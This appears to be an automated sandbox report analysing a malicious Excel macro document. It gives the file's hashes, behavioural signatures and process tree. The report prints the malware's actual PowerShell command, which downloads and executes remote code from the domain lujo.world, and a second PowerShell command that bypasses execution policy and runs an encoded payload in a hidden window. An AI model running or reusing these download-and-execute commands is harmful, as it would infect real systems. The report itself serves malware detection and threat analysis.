Analysis

Max time kernel: 135s
Max time network: 128s
Platform: windows10_x64
Resource: win10
Submitted: 14-07-2020 13:43
Tasks

Static task: static1
Behavioral task: behavioral1 (Sample: 290132621.xls, Resource: win7v200430)
Behavioral task: behavioral2 (Sample: 290132621.xls, Resource: win10)
General

Target: 290132621.xls
Size: 380KB
MD5: d0d45ae970be361aa26e069a0688d250
SHA1: 3abf3aced0effd49f2e3684496e27173c827e90d
SHA256: 88feb55be08b475bebdd8a2f6a78f14bd70f678f11943d8bb656163ea50985b6
SHA512: e5e94044642f72ae758b81b0155896c1f78b32d5ae6e231858900cf55e9d30081f24cc72e20283332fb2a2c5fc60ac318e02947964e0f3ca6dc7c9cae0b21477
Malware Config

Extracted: http://lujo.world/parse.jpg
Signatures

Suspicious use of SetWindowsHookEx (14 IoCs)
Processes:
  pid   process
  2920  EXCEL.EXE   (14 identical entries)

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description                                                                                              pid   pid_target  process         target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process  3168  2920        powersheLL.exe  EXCEL.EXE

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  3168  powersheLL.exe
  Token: SeDebugPrivilege  508   powershell.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
  pid   process
  3168  powersheLL.exe  (3 identical entries)
  508   powershell.exe  (3 identical entries)

Blacklisted process makes network request (3 IoCs)
Processes:
  flow  pid   process
  10    3168  powersheLL.exe
  12    508   powershell.exe
  13    508   powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                              process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz             EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid   process
  2920  EXCEL.EXE

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                       pid   process         target process
  PID 2920 wrote to memory of 3168  2920  EXCEL.EXE       powersheLL.exe
  PID 2920 wrote to memory of 3168  2920  EXCEL.EXE       powersheLL.exe
  PID 3168 wrote to memory of 508   3168  powersheLL.exe  powershell.exe
  PID 3168 wrote to memory of 508   3168  powersheLL.exe  powershell.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                          process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS           EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE  (PID 2920)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\290132621.xls"
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
  - Enumerates system info in registry

  C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe  (PID 3168)
    Command line: powersheLL.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lujo.world/parse.jpg')
    - Process spawned unexpected child process
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 508)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e 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
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request